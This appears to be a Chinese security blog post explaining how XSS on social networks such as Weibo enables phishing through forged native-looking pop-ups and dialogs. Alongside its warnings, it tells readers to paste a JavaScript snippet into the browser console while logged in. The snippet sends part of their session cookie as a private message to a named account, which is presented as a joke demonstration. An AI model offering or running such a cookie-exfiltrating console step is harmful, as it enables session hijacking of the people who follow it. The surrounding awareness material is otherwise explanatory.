前段時間一直在寫工具黨、大數據黑客相關的科普文，今天開始換點口味好了，來看看前端攻擊里一些“驚悚”的攻擊方式。

今天只說高級釣魚

如果深刻知道這種釣魚攻擊的人，估計以后會談魚色變，這次我不科普太多文字，只簡單說下這種在大眾面前幾乎一片空白的攻擊方式，所以看完本篇文字，很多人還會繼續得瑟：“反正我不會中招”，深入的講解我一般都放在一些內部的安全培訓上了，如果有時間計劃整出一篇paper出來，一定很精彩。

大家想想，在社交網絡里(weibo也算，具有社交屬性的都算)，我們對很多專屬于這個社交網絡的風格元素是不是習以為常了，比如漂亮的登錄頁面、設置頁面、修改密碼頁面、彈出層、聊天框、發消息界面等等，天天見，天天用，對這樣的風格習以為常了，哪天出現一個風格類似的新功能(比如提示“密碼異常，修改密碼”的彈出層)，也不會懷疑，還以為是新增的友好功能……

這些對于JavaScript來說都是可以偽造的啊，而且可以超級YD的偽造，代碼量也不用多少，為什么呢?這得感謝那些偉大的前端工程師，他們封裝了很多超級方便的接口:)

只要一個XSS(跨站腳本攻擊)，就可以引入任意JavaScript代碼，鬼魂一般，偽造了一個看起來真的假界面，釣到了想要的關鍵數據，目的就達到了。其實在真實的高級攻擊里，如果能不釣就不釣，多了交互就多了攻擊復雜度，一段JavaScript也許通過一些Hacking技巧就能拿到如明文密碼、隱私資料等數據，只要一招。

在社交網絡里，用戶體驗好作為第一要素，對于攻擊者來說，攻擊也會講究用戶體驗好，哪怕沒有XSS，也可以完成攻擊，想想，如何偽裝界面?只是利用XSS的攻擊更加原汁原味(我常說的原生態攻擊方式)。

原生態除了UI可以利用原生，還有相關的JS庫接口，比如針對weibo.com的一個小玩笑，大家可以用Chrome瀏覽器登錄自己的微博，然后按f12打開“開發者工具”，在Console中，復制上如下代碼，回車執行：

STK.core.io.ajax({method:’POST’,url:’/aj/message/add’,args:{text:document.cookie.substr(0,300),screen_name:’%E4%BD%99%E5%BC%A6′}})

如此簡潔的代碼，攻擊者要是利用起來該有多方便:D

釣魚無非就是欺騙，在社交網絡里利用XSS進行的高級釣魚攻擊真的讓人防不勝防，這種攻擊我很早就提出，我感覺已經在逐漸流行了，這就是為什么這兩年經常有人提到的“美工黑客”，恩，黑客為了生存，開始更猥瑣了，開始接觸美工了，美工的目的就是視覺欺騙。

最后：多一分警惕，少一次泄密……